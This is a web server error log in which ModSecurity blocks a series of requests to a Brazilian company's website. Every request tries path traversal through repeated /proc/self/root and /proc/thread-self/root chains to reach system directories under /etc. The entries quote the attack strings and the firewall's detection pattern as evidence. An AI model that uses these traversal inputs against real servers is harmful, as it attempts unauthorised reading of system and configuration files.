[Fri Mar 20 06:38:28.191012 2026] [:error] [pid 31215:tid 140411616036608] [client 74.7.241.31:58366] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VlAF0L0L-SsrnPo5XCQAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:38:29.256923 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:50756] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Vlda6ubjKNq_cu4bCUwAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:38:29.588832 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.241.31:54988] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VleoXxyEfFpUF8f9xWAAAAUU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:38:30.899976 2026] [:error] [pid 9818:tid 140411674785536] [client 74.7.241.31:54990] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Vll1pVZ5mVmJwsFMfTAAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:38:31.651470 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.243.128:33742] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Vl-oXxyEfFpUF8f9xWwAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:38:33.446581 2026] [:error] [pid 11642:tid 140411708356352] [client 74.7.241.31:54996] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Vmbninkcc-iUj5ApOEwAAA4Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:38:39.798161 2026] [:error] [pid 9818:tid 140411641214720] [client 74.7.243.128:33754] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Vn11pVZ5mVmJwsFMfVQAAAEw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:38:41.095809 2026] [:error] [pid 10189:tid 140411699963648] [client 74.7.243.128:53524] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VoTJ3M9BSuKP7CAYHiQAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:38:42.226803 2026] [:error] [pid 7235:tid 140411666392832] [client 74.7.243.128:53538] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VovqxLDW4GITHUkTU2gAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:38:42.687089 2026] [:error] [pid 7893:tid 140411699963648] [client 74.7.241.31:55000] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VohCii7xarUs8iHZXwAAAAgU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:38:43.556467 2026] [:error] [pid 31215:tid 140411624429312] [client 74.7.243.128:53552] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VowF0L0L-SsrnPo5XEAAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:38:44.744458 2026] [:error] [pid 10189:tid 140411548894976] [client 74.7.243.128:53564] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VpDJ3M9BSuKP7CAYHjQAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:38:47.265088 2026] [:error] [pid 10189:tid 140411540502272] [client 74.7.241.31:58344] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VpzJ3M9BSuKP7CAYHlwAAAJg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:38:48.674726 2026] [:error] [pid 31215:tid 140411674785536] [client 74.7.241.31:51478] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VqAF0L0L-SsrnPo5XEgAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:38:51.172310 2026] [:error] [pid 11167:tid 140411607643904] [client 74.7.241.31:51484] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Vq_HIg5MgXLBnicPo1wAAAdA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:38:53.741967 2026] [:error] [pid 10189:tid 140411725141760] [client 74.7.241.31:51490] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VrTJ3M9BSuKP7CAYHrwAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:38:55.118542 2026] [:error] [pid 31215:tid 140411708356352] [client 74.7.241.31:51500] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VrwF0L0L-SsrnPo5XFQAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:38:57.700945 2026] [:error] [pid 31215:tid 140411548894976] [client 74.7.241.31:51512] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VsQF0L0L-SsrnPo5XGgAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:39:00.441501 2026] [:error] [pid 7893:tid 140411716749056] [client 74.7.241.31:55410] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VshCii7xarUs8iHZXxgAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:39:01.617819 2026] [:error] [pid 10189:tid 140411683178240] [client 74.7.243.128:53580] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VtTJ3M9BSuKP7CAYHtwAAAIc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:39:01.870643 2026] [:error] [pid 10189:tid 140411708356352] [client 74.7.241.31:55424] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VtTJ3M9BSuKP7CAYHuAAAAIQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
